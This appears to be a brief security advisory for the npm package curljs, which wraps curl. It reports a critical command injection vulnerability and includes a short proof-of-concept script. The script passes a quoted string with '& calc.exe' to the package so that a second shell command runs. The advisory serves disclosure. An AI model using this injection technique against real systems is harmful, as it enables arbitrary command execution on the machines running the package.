curljs

vulnerability command injection
severity 9.8
language javascript
registry npm

:writing_hand: Description

curljs is a package that wraps the functionality of curl into an easy to use node module

Proof of Concept

Installation

npm i curljs

Run poc.js

var a=require("curljs");
a("' & calc.exe # '")
node poc.js

References